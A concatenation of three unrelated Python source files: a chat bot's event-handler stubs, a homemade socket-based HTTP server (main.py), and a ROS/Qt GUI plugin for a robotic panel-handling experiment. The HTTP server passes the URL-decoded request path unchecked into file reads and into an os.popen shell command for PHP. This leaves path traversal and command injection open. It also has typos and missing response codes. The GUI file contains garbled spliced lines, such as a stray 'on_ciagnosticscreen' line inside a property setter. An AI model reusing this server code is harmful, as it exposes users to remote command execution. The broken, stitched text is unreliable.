def on_voice_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_delete_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_group_member_join(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_group_member_leave(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_invite(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_background_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_title_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_icon_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_content_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_screen_room_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_screen_room_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_host_transfered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_text_message_force_removed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_removed_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_text_message_removed_by_admin(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tip(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_pin_announcement(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_open_to_everyone(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_invited_and_requested(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_invite_only(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_view_only_enabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_view_only_disabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_unpin_announcement(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tipping_enabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tipping_disabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_timestamp_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_welcome_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_invite_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_user_typing_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_user_typing_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def default(self, data): self.call(getframe(0).f_code.co_name, data)
|
main.py
|
import socket
import multiprocessing
import atexit
import os
import datetime
from urllib.parse import unquote
clist = []
addrlist = []
plist = []
response_codes = {
"200": "HTTP/1.0 200 OK\nServer:kral4 http server\nConnection: close\nContent-Type: text/html\n\n",
"400": "HTTP/1.0 400 Bad request\nCache-Control: no-cache\nServer:kral4 http server\nConnection: close\nContent-Type: text/html\n\n<html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>",
"404": "HTTP/1.0 404 Not Found\nCache-Control: no-cache\nServer:kral4 http server\nConnection: close\nContent-Type: text/html\n\n<html><body><h1>404 Not Found</h1>YThe requested file or directory is not exist</body></html>",
"500": "HTTP/1.0 500 Internal Server Error\nCache-Control: no-cache\nServer:kral4 http server\nConnection: close\nContent-Type: text/html\n\n<html><body><h1>500 Internal Server Error</h1>Server ran into a problem :(</body></html>",
"503": "HTTP/1.0 503 Service Unavailable\nCache-Control: no-cache\nServer:kral4 http server\nConnection: close\nContent-Type: text/html\n\n<html><body><h1>503 Service Unavailable</h1>There is a problem with server</body></html>"
}
def getconfig():
root_dir = ""
enable_php = ""
php_path = ""
with open("config.cfg", "r") as f:
lines = f.readlines()
for line in lines:
if "#" not in line:
line = line.split(":")
if line[0] == "root_dir":
root_dir = line[1].strip()
elif line[0] == "enable_php":
enable_php = int(line[1].strip())
elif line[0] == "php_path":
php_path = line[1].strip()
return root_dir, enable_php, php_path
def log(data2log):
with open("logs.txt", "a") as f:
f.write(str(datetime.datetime.now()) + ", " + str(data2log) + "\n")
def closesocket(sock):
sock.shutdown(socket.SHUT_RDWR)
sock.close()
log("Socket Closed " + str(sock))
def callphp(filepath):
last = b""
config = getconfig()
result = os.popen(config[2] + " -f " + filepath).read()
return result
def killthreads():
global plist
for p in plist:
p.terminate()
log("Server Closed")
def preparefileandrespond(filepath, c):
global response_codes
root_dir, enable_php, php_path = getconfig()
if filepath == "/":
#if rootdir
isindexhtml = os.path.isfile(root_dir + "index.html")
isindexphp = os.path.isfile(root_dir + "index.php")
if isindexhtml == True:
with open(root_dir + "index.html") as f:
filecontent = f.read()
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
elif isindexphp == True:
if enable_php != 1:
print("enable_php off canceling request")
c.sendal(response_codes["403"].encode())
closesocket(c)
else:
filecontent = callphp(root_dir + "index.php")
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
filecontent = os.listdir(root_dir)
response_head = "<html><head><title>list of /</title></head><body><h1>Kral4 HTTP Server</h1>"
response_body = ""
response_end = "</body></html>"
for content in filecontent:
response_body += f"<a href='{content}'>{content}</a>"
filecontent = response_head + response_body + response_end
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
#if not rootdir
isdir = os.path.isdir(root_dir + filepath)
isfile = os.path.isfile(root_dir + filepath)
if isdir == True:
isindexhtml = os.path.isfile(root_dir + "index.html")
isindexphp = os.path.isfile(root_dir + "index.php")
if isindexhtml == True:
with open(root_dir + "index.html") as f:
filecontent = f.read()
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
elif isindexphp == True:
if enable_php != 1:
print("enable_php off canceling request")
c.sendal(response_codes["403"].encode())
closesocket(c)
else:
filecontent = callphp(root_dir + "index.php")
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
filecontent = os.listdir(root_dir)
response_head = "<html><head><title>list of /</title></head><body><h1>Kral4 HTTP Server</h1>"
response_body = ""
response_end = "</body></html>"
for content in filecontent:
response_body += f"<a href='{content}'>{content}</a>"
filecontent = response_head + response_body + response_end
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
elif isfile == True:
if "." in filepath:
fileext = filepath.split(".")
if fileext[-1] == "php":
if enable_php != 1:
print("enable_php off canceling request")
c.sendall(response_codes["403"].encode())
closesocket(c)
else:
filecontent = callphp(root_dir + filepath)
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
with open(root_dir + filepath, "r") as f:
filecontent = f.read()
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
with open(root_dir + filepath, "r") as f:
filecontent = f.read()
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
#even if isdir or isfile returns false try this, i made here quickly may contain bugs
try:
if "php" in filepath:
if enable_php != 1:
print("enable_php off canceling request")
c.sendall(response_codes["403"].encode())
closesocket(c)
else:
filecontent = callphp(root_dir + filepath)
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
else:
with open(root_dir + filepath, "r") as f:
filecontent = f.read()
finalresponse = response_codes["200"] + filecontent
c.sendall(finalresponse.encode())
closesocket(c)
except:
c.sendall(response_codes["404"].encode())
closesocket(c)
def processandrespond(c, data):
global response_codes
request_method = ""
request_path = ""
http_version = ""
user_agent = ""
for d in data:
if b"HTTP" in d:
httpline = d.decode().split(" ")
request_method = httpline[0]
request_path = httpline[1]
http_version = httpline[2]
elif b"User-Agent" in d:
useragentline = d.decode().split("User-Agent:")
user_agent = useragentline[1]
if request_method and request_path and http_version and user_agent != "":
request_path = unquote(request_path)
print(request_method, request_path, http_version, user_agent)
preparefileandrespond(request_path, c)
else:
c.sendall(response_codes['400'].encode())
closesocket(c)
log(request_method + " " + request_path + " " + http_version + " " + user_agent + " " + str(c))
def receivefromclient(c):
global response_codes
data = c.recv(4096)
if b"\r\n" in data:
data = data.split(b"\r\n")
p = multiprocessing.Process(target=processandrespond, args=(c, data))
p.start()
plist.append(p)
elif b"\r\n" in data:
data = data.split(b"\n")
p = multiprocessing.Process(target=processandrespond, args=(c, data))
p.start()
plist.append(p)
else:
c.sendall(response_codes["400"].encode())
closesocket(c)
def accept(s):
global clist
global addrlist
global plist
while True:
c, addr = s.accept()
clist.append(c)
addrlist.append(addr)
p = multiprocessing.Process(target=receivefromclient, args=(c,))
p.start()
plist.append(p)
log("Connection Accepted " + str(addr) + str(c))
def main():
global plist
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", 8080))
s.listen()
print("listening")
atexit.register(killthreads)
p = multiprocessing.Process(target=accept, args=(s,))
p.start()
plist.append(p)
log("Server Started")
if __name__ == "__main__":
main()
|
experiment_gui_module.py
|
import os
import rospy
import rospkg
import collections
import time
import sys
import subprocess
import numpy as np
from qt_gui.plugin import Plugin
from python_qt_binding import loadUi
from python_qt_binding.QtWidgets import QWidget, QDialog
from python_qt_binding.QtCore import QMutex, QMutexLocker,QSemaphore, QThread
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from execute_gui_steps import GUI_Step_Executor
from rpi_arm_composites_manufacturing_gui.msg import GUIStepAction, GUIStepGoal
from safe_kinematic_controller.msg import ControllerState as controllerstate
from safe_kinematic_controller.msg import ControllerMode
from safe_kinematic_controller.srv import SetControllerMode, SetControllerModeRequest
from rpi_arm_composites_manufacturing_process.msg import ProcessStepAction, ProcessStepGoal, ProcessState, ProcessStepFeedback
import actionlib
from rqt_console import console_widget
from rqt_console import message_proxy_model
from rqt_plot import plot
import rosservice
import rviz
import safe_kinematic_controller.ros.commander as controller_commander_pkg
from panel_selector_window_enlarged import PanelSelectorWindow
from user_authentication_window import UserAuthenticationWindow
#TODO Integrate pyqtgraph into automatic package download
import pyqtgraph as pg
import threading
'''
freeBytes=QSemaphore(100)
usedBytes=QSemaphore()
consoleData=collections.deque(maxlen=200)
'''
class LEDIndicator(QAbstractButton):
scaledSize=1000.0
def __init__(self):
QAbstractButton.__init__(self)
self.setMinimumSize(24, 24)
self.setCheckable(True)
# Green
self.on_color_1 = QColor(0, 255, 0)
self.on_color_2 = QColor(0, 192, 0)
self.off_color_1 = QColor(255, 0, 0)
self.off_color_2 = QColor(128, 0, 0)
def resizeEvent(self, QResizeEvent):
self.update()
def paintEvent(self, QPaintEvent):
realSize = min(self.width(), self.height())
painter = QPainter(self)
pen = QPen(Qt.black)
pen.setWidth(1)
painter.setRenderHint(QPainter.Antialiasing)
painter.translate(self.width() / 2, self.height() / 2)
painter.scale(realSize / self.scaledSize, realSize / self.scaledSize)
gradient = QRadialGradient(QPointF(-500, -500), 1500, QPointF(-500, -500))
gradient.setColorAt(0, QColor(224, 224, 224))
gradient.setColorAt(1, QColor(28, 28, 28))
painter.setPen(pen)
painter.setBrush(QBrush(gradient))
painter.drawEllipse(QPointF(0, 0), 500, 500)
gradient = QRadialGradient(QPointF(500, 500), 1500, QPointF(500, 500))
gradient.setColorAt(0, QColor(224, 224, 224))
gradient.setColorAt(1, QColor(28, 28, 28))
painter.setPen(pen)
painter.setBrush(QBrush(gradient))
painter.drawEllipse(QPointF(0, 0), 450, 450)
painter.setPen(pen)
if self.isChecked():
gradient = QRadialGradient(QPointF(-500, -500), 1500, QPointF(-500, -500))
gradient.setColorAt(0, self.on_color_1)
gradient.setColorAt(1, self.on_color_2)
else:
gradient = QRadialGradient(QPointF(500, 500), 1500, QPointF(500, 500))
gradient.setColorAt(0, self.off_color_1)
gradient.setColorAt(1, self.off_color_2)
painter.setBrush(gradient)
painter.drawEllipse(QPointF(0, 0), 400, 400)
@pyqtProperty(QColor)
def onColor1(self):
return self.on_color_1
@onColor1.setter
def onColor1(self, color):
self.on_color_1 = color
@pyqtProperty(QColor)
def onColor2(self):
return self.on_color_2
@onColor2.setter
def onColor2(self, color):
self.on_ciagnosticscreen.backToRun.pressed.connect(self._to_run_screen)
#self._runscolor_2 = color
@pyqtProperty(QColor)
def offColor1(self):
return self.off_color_1
@offColor1.setter
def offColor1(self, color):
self.off_color_1 = color
@pyqtProperty(QColor)
def offColor2(self):
return self.off_color_2
@offColor2.setter
def offColor2(self, color):
self.off_color_2 = color
class VacuumConfirm(QWidget):
def __init__(self):
super(VacuumConfirm,self).__init__()
class ConsoleThread(QThread):
def __init__(self,State_info):
super(ConsoleThread,self).__init__()
self.State_info=State_info
def run(self):
while(True):
usedBytes.acquire()
dataval=consoleData.pop()
self.State_info.addItem(dataval)
self.State_info.scrollToBottom()
#print dataval
freeBytes.release()
class RQTPlotWindow(QMainWindow):
def __init__(self, parent=None):
super(RQTPlotWindow, self).__init__(None)
self.rqtgraph=plot.Plot(parent)
class ExperimentGUI(Plugin):
repaint_signal= pyqtSignal()
LED_change_signal=pyqtSignal()
callback_signal=pyqtSignal(controllerstate)
#signal name=pyqtSignal(datatype,datatype)
def __init__(self, context):
super(ExperimentGUI, self).__init__(context)
# Give QObjects reasonable names
self.plans=['Starting Position','Above Panel', 'Panel Grabbed','Above Placement Nest','Panel Placed']
#state_dict ties each state to planlistindex values
#self.state_dict={'reset_position':0,'pickup_prepare':1,'pickup_lower':2,'pickup_grab_first_step':2,'pickup_grab_second_step':2,'pickup_raise':2,'transport_panel':3,'place_lower':4,'place_set_first_step':4,'place_set_second_step':4,'place_raise':4}
self.gui_execute_states=["reset","panel_pickup","pickup_grab","transport_panel","place_panel"]
self.execute_states=[['plan_to_reset_position','move_to_reset_position'],['plan_pickup_prepare','move_pickup_prepare'],['plan_pickup_lower','move_pickup_lower','plan_pickup_grab_first_step','move_pickup_grab_first_step','plan_pickup_grab_second_step','move_pickup_grab_second_step','plan_pickup_raise','move_pickup_raise'],
['plan_transport_payload','move_transport_payload'],['plan_place_set_second_step']]
self.teleop_modes=['Error','Off','Joint','Cartesian','Cylindrical','Spherical']
self.current_teleop_mode=1
self.teleop_button_string="Tele-op\nMode:\n"
self.setObjectName('MyPlugin')
self._lock=threading.Lock()
#self._send_event=threading.Event()
#elf.controller_commander=controller_commander_pkg.ControllerCommander()
# Process standalone plugin command-line arguments
from argparse import ArgumentParser
parser = ArgumentParser()
# Add argument(s) to the parser.
parser.add_argument("-q", "--quiet", action="store_true",
dest="quiet",
help="Put plugin in silent mode")
args, unknowns = parser.parse_known_args(context.argv())
if not args.quiet:
print 'arguments: ', args
print 'unknowns: ', unknowns
# Create QWidget
self.in_process=None
self.recover_from_pause=False
#rospy.get_param("rosbag_name")
#<param name="start_time" command="date +'%d-%m-%Y_%Ih%Mm%S'"/>
#rosbag record args="record -O arg('start_time')
self._mainwidget = QWidget()
self.layout = QGridLayout()
self._mainwidget.setLayout(self.layout)
self.disconnectreturnoption=False
self.stackedWidget=QStackedWidget()#self._mainwidget)
self.layout.addWidget(self.stackedWidget,0,0)
self._welcomescreen=QWidget()
self._runscreen=QWidget()
self._errordiagnosticscreen=QWidget()
self.stackedWidget.addWidget(self._welcomescreen)
self.stackedWidget.addWidget(self._runscreen)
#self.stackedWidget.addWidget(self._errordiagnosticscreen)
#self._data_array=collections.deque(maxlen=500)
self._proxy_model=message_proxy_model.MessageProxyModel()
self._rospack=rospkg.RosPack()
#self.console=console_widget.ConsoleWidget(self._proxy_model,self._rospack)
self.robotconnectionled=LEDIndicator()
self.robotconnectionled.setDisabled(True) # Make the led non clickable
self.forcetorqueled=LEDIndicator()
self.forcetorqueled.setDisabled(True) # Make the led non clickable
self.overheadcameraled=LEDIndicator()
self.overheadcameraled.setDisabled(True) # Make the led non clickable
self.grippercameraled=LEDIndicator()
self.grippercameraled.setDisabled(True) # Make the led non clickable
self.runscreenstatusled=LEDIndicator()
self.runscreenstatusled.setDisabled(True)
self.step_executor=GUI_Step_Executor()
self.step_executor.error_signal.connect(self._feedback_receive)
self.step_executor.success_signal.connect(self.process_state_set)
self.repaint_signal.connect(self._repaint)
#self.callback_signal.connect(self.callback_gui)
#self.step_executor.error_function=self._feedback_receive
#Need this to pause motions
self.process_client=actionlib.ActionClient('process_step', ProcessStepAction)
self.process_client.wait_for_server()
self.placement_targets={'leeward_mid_panel':'panel_nest_leeward_mid_panel_target','leeward_tip_panel':'panel_nest_leeward_tip_panel_target'}
self.placement_target='panel_nest_leeward_mid_panel_target'
self.panel_type='leeward_mid_panel'
self.client_handle=None
service_list=rosservice.get_service_list()
if('/overhead_camera/trigger' in service_list):
self.led_change(self.overheadcameraled,True)
else:
self.led_change(self.overheadcameraled,False)
if('/gripper_camera_2/trigger' in service_list):
self.led_change(self.grippercameraled,True)
else:
self.led_change(self.grippercameraled,False)
self.mode=0
self.count=0
self.data_count=0
self.force_torque_data=np.zeros((6,1))
self.joint_angle_data=np.zeros((6,1))
# Get path to UI file which should be in the "resource" folder of this package
self.welcomescreenui = os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'resource', 'welcomeconnectionscreen.ui')
self.runscreenui = os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'resource', 'Runscreenadvanced.ui')
self.skippingrunscreenui=os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'resource', 'Runscreenadvanced.ui')
self.errorscreenui = os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'resource', 'errordiagnosticscreen.ui')
self.retry_button = os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'images', 'retry.png')
self.play_button = os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'images', 'play.png')
self.rewound=False
self.pre_reset_list_index=0
# Extend the widget with all attributes and children from UI file
loadUi(self.welcomescreenui, self._welcomescreen)
loadUi(self.runscreenui, self._runscreen)
loadUi(self.errorscreenui,self._errordiagnosticscreen)
# Give QObjects reasonable names
self._mainwidget.setObjectName('MyPluginUi')
# Show _widget.windowTitle on left-top of each plugin (when
# it's set in _widget). This is useful when you open multiple
# plugins at once. Also if you open multiple instances of your
# plugin at once, these lines add number to make it easy to
# tell from pane to pane.
if context.serial_number() > 1:
self._mainwidget.setWindowTitle(self._mainwidget.windowTitle() + (' (%d)' % context.serial_number()))
context.add_widget(self._mainwidget)
self.context=context
self.plugin_settings=None
self.instance_settings=None
#self._errordiagnosticscreen.consoleWidget=console_widget.ConsoleWidget(self._proxy_model,self._rospack)
#####consoleiagnosticscreen.backToRun.pressed.connect(self._to_run_screen)
#self._runscThread=ConsoleThread(self._widget.State_info)
# self._welcomescreen.statusFormLayout.takeAt(0)
self._welcomescreen.statusFormLayout.addWidget(self.robotconnectionled,0,0)
self._welcomescreen.statusFormLayout.addWidget(self.forcetorqueled,2,0)
self._welcomescreen.statusFormLayout.addWidget(self.overheadcameraled,4,0)
self._welcomescreen.statusFormLayout.addWidget(self.grippercameraled,6,0)
#self._runscreen.connectionLayout.addWidget(self.runscreenstatusled,0,1)
#self._welcomescreen.robotConnectionWidget.addWidget(self.led)
#consoleThread.finished.connect(app.exit)
#####consoleThread.start()
#self.rviz_starter=os.path.join(rospkg.RosPack().get_path('rpi_arm_composites_manufacturing_gui'), 'src', 'rpi_arm_composites_manufacturing_gui', 'rviz_starter.py')
# Add widget to the user interface
#context.add_widget(console)==QDialog.Accepted
#context.add_widget(rqt_console)
#self._runscreen.planList.setSelectionMode(QAbstractItemView.ExtendedSelection)
#for entry in self.plans:
# listentry=QListWidgetItem(entry)
# listentry.setFlags(Qt.ItemIsSelectable)
# self._runscreen.planList.addItem(listentry)
#self._runscreen.planList.item(0).setSelected(True)
self.shared_control_enabled=False
self.advancedmode=False
self.planListIndex=0
self.initialize_runscreen(self._runscreen)
self.commands_sent=False
self._set_controller_mode=rospy.ServiceProxy("set_controller_mode",SetControllerMode)
#rospy.Subscriber("GUI_state", ProcessState, self.process_state_set)
#rospy.Subscriber('gui_error', String, self._feedback_receive())
self.force_torque_plot_widget=QWidget()
self.joint_angle_plot_widget=QWidget()
self._welcomescreen.openConfig.clicked.connect(self._open_config_options)
self._welcomescreen.openAdvancedOptions.pressed.connect(self._open_login_prompt)
#hides these buttons from view since they are currently unused
self._welcomescreen.openConfig.setHidden(True)
self._welcomescreen.openAdvancedOptions.setHidden(True)
self._welcomescreen.toRunScreen.pressed.connect(self._to_run_screen)
self.errored=False
#self._errordiagnosticscreen.openOverheadCameraView.pressed.connect(self._open_overhead_camera_view)
#self._errordiagnosticscreen.openGripperCameraViews.pressed.connect(self._open_gripper_camera_views)
self._errordiagnosticscreen.openForceTorqueDataPlot.pressed.connect(self._open_force_torque_data_plot)
self._errordiagnosticscreen.openJointAngleDataPlot.pressed.connect(self._open_joint_angle_data_plot)
self._errordiagnosticscreen.backToRun.pressed.connect(self._to_run_screen)
#self._runscreen.widget.frame=rviz.VisualizationFrame()
#self._runscreen.widget.frame.setSplashPath( "" )
## VisualizationFrame.initialize() must be called before
## VisualizationFrame.load(). In fact it must be called
## before most interactions with RViz classes because it
## instantiates and initializes the VisualizationManager,
## which is the central class of RViz.
#self._runscreen.widget.frame.initialize()
#self.manager = self._runscreen.widget.frame.getManager()
self.skipping=False
self.callback_lock=threading.Lock()
self.callback_msg=None
rospy.Timer(rospy.Duration(0.1), self.callback_gui)
rospy.Subscriber("controller_state", controllerstate, self.callback)
# self._welcomescreen.openAdvancedOptions.pressed.connect(self._open_advanced_options)
def initialize_runscreen(self,runscreen):
runscreen.connectionLayout.addWidget(self.runscreenstatusled,0,1)
runscreen.planList.setSelectionMode(QAbstractItemView.ExtendedSelection)
for entry in self.plans:
listentry=QListWidgetItem(entry)
listentry.setFlags(Qt.ItemIsSelectable)
runscreen.planList.addItem(listentry)
icon=QIcon()
icon.addPixmap(QPixmap(self.play_button))
runscreen.nextPlan.setIcon(icon)
runscreen.nextPlan.setIconSize(QSize(100,100))
runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
runscreen.panelType.setText(self.panel_type)
runscreen.placementNestTarget.setText("Leeward Mid Panel Nest")
runscreen.panelType.setReadOnly(True)
runscreen.placementNestTarget.setReadOnly(True)
runscreen.backToWelcome.pressed.connect(self._to_welcome_screen)
#self._runscreen.toErrorScreen.pressed.connect(self._to_error_screen)
runscreen.nextPlan.pressed.connect(self._next_plan)
runscreen.previousPlan.pressed.connect(self._previousPlan)
runscreen.resetToHome.pressed.connect(self._reset_position)
runscreen.stopPlan.pressed.connect(self._stopPlan)
runscreen.accessTeleop.pressed.connect(self.change_teleop_modes)
runscreen.sharedControl.pressed.connect(self.start_shared_control)
runscreen.stopPlan.setDisabled(True)
runscreen.skipCommands.pressed.connect(self.start_skipping)
def led_change(self,led,state):
led.setChecked(state)
def _to_welcome_screen(self):
self.stackedWidget.setCurrentIndex(0)
def _set_controller_mode_dispatch(self,mode,speed,bias,threshold):
req=SetControllerModeRequest(mode,speed,bias,threshold)
res=self._set_controller_mode(req)
if(res.error_code!=ControllerMode.MODE_SUCCESS):
self.step_executor.error="GUI failed to set controller mode"
self.step_executor.error_signal.emit()
def _to_run_screen(self):
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_HALT,1,[],[])
self.set_controller_mode(ControllerMode.MODE_HALT,1,[],[])
if(self.stackedWidget.currentIndex()==0):
self.messagewindow=PanelSelectorWindow()
self.messagewindow.show()
self.messagewindow.setFixedSize(self.messagewindow.size())
if self.messagewindow.exec_():
next_selected_panel=self.messagewindow.get_panel_selected()
if(next_selected_panel != None):
self.panel_type=next_selected_panel
self.placement_target=self.placement_targets[self.panel_type]
self.stackedWidget.setCurrentIndex(1)
self._runscreen.panelType.setText(self.panel_type)
if(self.panel_type=='leeward_mid_panel'):
self._runscreen.placementNestTarget.setText("Leeward Mid Panel Nest")
elif(self.panel_type=='leeward_tip_panel'):
self._runscreen.placementNestTarget.setText("Leeward Tip Panel Nest")
else:
raise Exception('Unknown panel type selected')
def _to_error_screen(self):
self.stackedWidget.setCurrentIndex(2)
def _open_login_prompt(self):
if(self._login_prompt()):
self.stackedWidget.removeWidget(self._runscreen)
self._runscreenadvanced=QWidget()
loadUi(self.skippingrunscreenui, self._runscreenadvanced)
self.stackedWidget.addWidget(self._runscreenadvanced)
self.initialize_runscreen(self._runscreenadvanced)
self._runscreen.skipCommands.pressed.connect(self.start_skipping)
self.advancedmode=True
def _login_prompt(self):
self.loginprompt=UserAuthenticationWindow()
if self.loginprompt.exec_():
#self.loginprompt.show()
#while(not self.loginprompt.returned):
#pass
return True
else:
return False
def _open_config_options(self):
if(self._login_prompt()):
self.led_change(self.robotconnectionled,True)
#def _open_overhead_camera_view(self):
#def _open_gripper_camera_views(self):
def _open_force_torque_data_plot(self):
self.plot_container=[]
self.x_data = np.arange(1)
self.force_torque_app=QApplication([])
self.force_torque_plot_widget=pg.plot()
self.force_torque_plot_widget.addLegend()
#self.layout.addWidget(self.force_torque_plot_widget,0,1)
self.force_torque_plot_widget.showGrid(x=True, y=True)
self.force_torque_plot_widget.setLabel('left','Force/Torque','N/N*m')
self.force_torque_plot_widget.setLabel('bottom','Sample Number','n')
self.plot_container.append(self.force_torque_plot_widget.plot(pen=(255,0,0),name="Torque X"))
self.plot_container.append(self.force_torque_plot_widget.plot(pen=(0,255,0),name="Torque Y"))
self.plot_container.append(self.force_torque_plot_widget.plot(pen=(0,0,255),name="Torque Z"))
self.plot_container.append(self.force_torque_plot_widget.plot(pen=(255,255,0),name="Force X"))
self.plot_container.append(self.force_torque_plot_widget.plot(pen=(0,255,255),name="Force Y"))
self.plot_container.append(self.force_torque_plot_widget.plot(pen=(255,0,255),name="Force Z"))
#self.force_torque_plotter=PlotManager(title='Force Torque Data',nline=3,widget=self.force_torque_plot_widget)
#self.force_torque_plot_widget.show()
#self.force_torque_plotter.add("Hello", np.arange(10))
#self.force_torque_plotter.update()
#self.rosGraph.show()
#self.rosGraph.exec_()
def _open_joint_angle_data_plot(self):
self.plot_container=[]
self.x_data = np.arange(1)
self.joint_angle_app=QApplication([])
self.joint_angle_plot_widget=pg.plot()
self.joint_angle_plot_widget.addLegend()
#self.layout.addWidget(self.joint_angle_plot_widget,0,1)
self.joint_angle_plot_widget.showGrid(x=True, y=True)
self.joint_angle_plot_widget.setLabel('left','Force/Torque','N/N*m')
self.joint_angle_plot_widget.setLabel('bottom','Sample Number','n')
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(255,0,0),name="Joint 1"))
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(0,255,0),name="Joint 2"))
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(0,0,255),name="Joint 3"))
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(255,255,0),name="Joint 4"))
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(0,255,255),name="Joint 5"))
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(255,0,255),name="Joint 6"))
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(255,255,255),name="Joint 7"))
def _open_rviz_prompt(self):
subprocess.Popen(['python', self.rviz_starter])
# def _open_advanced_options(self):
# main = Main()
# sys.exit(main.main(sys.argv, standalone='rqt_rviz/RViz', plugin_argument_provider=add_arguments))
def _raise_rviz_window(self):
subprocess.call(["xdotool", "search", "--name", "rviz", "windowraise"])
def _next_plan(self):
self.plan_list_reset()
if(not(self.skipping)):
self._runscreen.nextPlan.setDisabled(True)
self._runscreen.previousPlan.setDisabled(True)
self._runscreen.resetToHome.setDisabled(True)
self._runscreen.stopPlan.setDisabled(False)
self.reset_teleop_button()
if(self.errored and not self.recover_from_pause):
self.planListIndex-=1
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
